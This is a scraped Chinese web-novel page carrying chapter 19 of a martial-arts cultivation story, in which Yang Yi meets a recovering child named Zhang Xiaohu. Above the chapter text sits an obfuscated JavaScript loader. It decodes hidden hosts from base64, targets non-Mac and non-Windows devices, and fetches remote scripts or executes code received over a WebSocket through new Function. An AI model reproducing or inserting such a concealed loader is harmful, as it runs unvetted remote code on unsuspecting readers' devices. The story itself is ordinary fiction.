宜小说

字:
关灯 护眼
宜小说 > 我的武学自己会修炼 > 第十九章 我都要亏死啦!
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第十九章 我都要亏死啦!

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
杨易没理会这些人的白眼。
  不好好练功,跑到这种地方来干什么?
  他的视线下意识瞥向远处。
  嘶!
  镇魔树下。
  竟有一人在修炼!
  这人杨易上次经过这里的时候,碰到过。
  “难道他在这盘坐了一个月?!”
  杨易有些不敢置信。
  但瞧对方的姿态。
  真的跟之前完全一样。
  如老僧入定!
  “赵恒师兄当真帅气呀。”
  “肤浅,那叫不食人间烟火!”
  “我听某掌院评价,这一届弟子中,率先进入化念的,或许不会是柳阳师兄,反而是后来居上的赵恒师兄。”
  “但赵恒师兄还是入劲第二重,聚鼎层次,距离冲击化念,还差着一些。”
  “怕啥,以赵恒师兄的天赋,突破如饮水。”
  底下的女生流露出痴迷的神情。
  杨易听到了自己想要的信息。
  原来,这人就是赵恒!
  他对这个名字很熟悉,却一直没和人对上。
  “赤霞功就是跟着他修炼导致经脉逆阻的?”
  杨易眉头微皱,一时半会看不出赵恒有何异常,便继续上山。
  从药田找来庄呈露所需的灵药后。
  又急匆匆赶回丹房。
  “庄师姐,你点的药!”
  杨易将一个布包递上去。
  这采药的钱还是他用贡献点垫付的。
  只要能得到龙血丹,这点钱不算什么。
  “怎么去了这么久?差点坏事!”
  庄呈露打开布包检查了一下。
  “我那丹药……”
  杨易动了动嘴唇。
  “没看正练着么?为了炼这龙血丹,我可是三天三夜没合眼了。”
  庄呈露乌了他一眼,脸色确实不佳。
  正因如此,杨易不再多说,行了一个礼,在屋外静静等待。
  庄呈露彻底关上丹房的外门。
  “嘿,大哥哥,你在这!”
  杨易正等着。
  旁边忽然出现一个小孩。
  正是张小虎!
  “你没事了?”
  杨易惊喜。
  这才过去五天时间!
  看来庄呈露的手段确实了得。
  “庄姐姐的丹药很灵,我感觉好多了。”
  张小虎瘦的跟猴子一样,但精气神比起之前好了太多。
  他说话的时候,从口袋里摸出一颗黑色的药丸吞下,就跟吃糖豆一样。
  “庄姐姐说药不能停。”
  张小虎瞧杨易一直盯着药丸看,便解释道。
  “能把药给我瞧瞧么?”
  杨易想起庄呈露答应救治张小虎的条件。
  “喏!”
  张小虎抛出一颗。
  “你不打我了?”
  杨易打趣道。
  他和张小虎第一次在乌梅庄见面,对方可用竹刀攻击他来着。
  “对不起,大哥哥,我正想找你道歉呢。”
  张小虎挠了挠后脑勺,嘿笑道:“当时我在想,若不是大哥哥你出现,我爷爷就不会带我上山,所以就把气撒在你身上了。”
  “那你现在恨你爷爷么?”
  杨易的气量还没有小到跟一个小孩计较这么多。
  “当然不恨啦,反而觉得挺对不起他的,他本来是有机会冲击炼血境界的,可最终把钱全部花在了我身上。听那道人的话,喝幽魂草的露水,实属无奈之举。”
  张小虎摇了摇头,而后张眼看着杨易,轻声道:“大哥哥你知道么?其实那露水是我主动喝的,反而是爷爷有点犹豫。我当时想,能治病最好,不能治病,死了一了百了,我爷爷奶奶就不用这么辛苦啦!我也轻松!”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师